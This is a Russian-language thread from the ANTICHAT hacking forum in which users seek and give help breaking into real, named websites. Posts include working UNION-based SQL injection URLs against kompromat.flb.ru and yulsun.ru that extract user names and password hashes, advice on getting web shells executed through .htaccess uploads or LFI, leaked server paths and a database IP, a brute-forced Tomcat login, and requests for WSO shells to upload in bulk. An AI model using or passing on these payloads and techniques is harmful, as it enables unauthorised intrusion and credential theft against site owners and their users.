ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
07.03.2014, 18:07
|
|
Guest
Сообщений: n/a
Провел на форуме:
114076
Репутация:
54
|
|
Сообщение от zombak18
zombak18 said:
Можно ли залить веб шелл в одном из этих форматов?
Шелл можно вписать в любой из этих форматов. Другое дело, что при нормальных настройках ни один из них не будет исполняться веб-сервером. Поэтому вам надо либо догружать .htaccess, либо делать lfi. Либо же обходить фильтры на формат\расширение.
|
|
|
|
10.03.2014, 02:35
|
|
Guest
Сообщений: n/a
Провел на форуме:
23886
Репутация:
-3
|
|
kompromat.flb.ru/material1.phtml?id=-153+union+select+1,2,3 ,4,5,6,7,8,9,10,11+--+
Не могу найти путь к корню сайта
|
|
|
|
10.03.2014, 04:26
|
|
Guest
Сообщений: n/a
Провел на форуме:
62329
Репутация:
19
|
|
Сообщение от Win32BOT
Win32BOT said:
kompromat.flb.ru/material1.phtml?id=-153+union+select+1,2,3 ,4,5,6,7,8,9,10,11+--+
Не могу найти путь к корню сайта
Я пошел по пути родителя, хотя он уже и на другом сервере: http://flb.ru/user_config.php
"Fatal error: Class 'User' not found in /var/www/flb.ru/user_config.php on line 10"
В гуглкеш нашлось такое:
"Warning: mysql_connect() [function.mysql-connect]: Can't connect to MySQL server on '95.211.1.162' (4) in /home/u475266731/public_html/portal-object/db/dbconnect.obj.php on line 45"
В общем, я бы посоветовал ковырять в сторону соседей.
|
|
|
|
10.03.2014, 20:46
|
|
Guest
Сообщений: n/a
Провел на форуме:
107835
Репутация:
23
|
|
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//agfmpack.ru/page/92'/[/COLOR][/COLOR]
Кто знает как раскрутить? |
|
|
|
11.03.2014, 19:04
|
|
Guest
Сообщений: n/a
Провел на форуме:
20730
Репутация:
0
|
|
Подобрал пароль от Apache Tomcat/7.0.47
Что можно там сделать? Есть ли способ порутать сервак полностью?
|
|
|
|
12.03.2014, 14:59
|
|
Guest
Сообщений: n/a
Провел на форуме:
5323
Репутация:
0
|
|
Проблемка
есть таблица user
узнаем колонки
http://www.yulsun.ru/index.php?katalog=s454e435&tipavto=1&setmanuf=579& setmod=7967&settyp=30716&shgruptov=-8+union+select+1,2,group_concat(column_name),4,5+f rom+information_schema.columns+where+table_name=0x 75736572+--+
Далее делаю
http://www.yulsun.ru/index.php?katalog=s454e435&tipavto=1&setmanuf=579& setmod=7967&settyp=30716&shgruptov=-8+union+select+1,2,group_concat(User,0x3b,Password ),4,5+from+user+--+
И результат: ПУСТОТА!
Need help!
|
|
|
|
12.03.2014, 15:08
|
|
Guest
Сообщений: n/a
Провел на форуме:
290351
Репутация:
173
|
|
Сообщение от AHTNkiller
AHTNkiller said:
Проблемка
есть таблица user
узнаем колонки
http://www.yulsun.ru/index.php?katalog=s454e435&tipavto=1&setmanuf=579& setmod=7967&settyp=30716&shgruptov=-8+union+select+1,2,group_concat(column_name),4,5+f rom+information_schema.columns+where+table_name=0x 75736572+--+
Далее делаю
http://www.yulsun.ru/index.php?katalog=s454e435&tipavto=1&setmanuf=579& setmod=7967&settyp=30716&shgruptov=-8+union+select+1,2,group_concat(User,0x3b,Password ),4,5+from+user+--+
И результат: ПУСТОТА!
Need help!
укажи с какой БД хочешь вытащить, например mysql
http://www.yulsun.ru/index.php?katalog=s454e435&tipavto=1&setmanuf=579& setmod=7967&settyp=30716&shgruptov=-8+union+select+1,2,group_concat%28User,0x3b,Passwo rd%29,4,5+from+mysql.user--
список БД
Сообщение от None
http://www.yulsun.ru/index.php?katalog=s454e435&tipavto=1&setmanuf=579& setmod=7967&settyp=30716&shgruptov=-8+union+select+1,2,schema_name,4,5+from+informatio n_schema.schemata--
|
|
|
|
12.03.2014, 17:41
|
|
Guest
Сообщений: n/a
Провел на форуме:
6813
Репутация:
0
|
|
Парни помогите ответить на вопросы,если можно на примерах!
Сообщение от CoolHucker
CoolHucker said:
1.Откуда берут шеллы для слива трафика?
2.Киньте ссылку на актуальную версию WSO
3.Если сначало ищут ресурс,потом сканят,потом ломают-получают доступ-заливают шелл(откуда берут русурс?С неба он не падает)
4.Если лить шеллы пачками как это делать?
Если кто-то всё это знает,помогите,Не обижу |
|
|
|
12.03.2014, 17:46
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от CoolHucker
CoolHucker said:
Парни помогите ответить на вопросы,если можно на примерах!
Если кто-то всё это знает,помогите,Не обижу
Сообщение от CoolHucker
CoolHucker said:
1.Откуда берут шеллы для слива трафика?
сам понял что спросил?
Сообщение от CoolHucker
CoolHucker said:
2.Киньте ссылку на актуальную версию WSO
тебя в гугле забанили?
Сообщение от CoolHucker
CoolHucker said:
3.Если сначало ищут ресурс,потом сканят,потом ломают-получают доступ-заливают шелл(откуда берут русурс?С неба он не падает)
омг, ты реально такой тупой или шутишь? в гугл вбиваешь слово лох и вот тебе куча ресурсов
Сообщение от CoolHucker
CoolHucker said:
4.Если лить шеллы пачками как это делать?
руками блэть
Сообщение от OxoTnik
OxoTnik said:
укажи с какой БД хочешь вытащить, например mysql
http://www.yulsun.ru/index.php?katalog=s454e435&tipavto=1&setmanuf=579& setmod=7967&settyp=30716&shgruptov=-8+union+select+1,2,group_concat%28User,0x3b,Passwo rd%29,4,5+from+mysql.user--
список БД
та не, нефига)) если бы была выбрана не та БД то написало бы ошибку, нужно вывод взять в substr
|
|
|
|
13.03.2014, 17:35
|
|
Guest
Сообщений: n/a
Провел на форуме:
182660
Репутация:
324
|
|
deleted
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
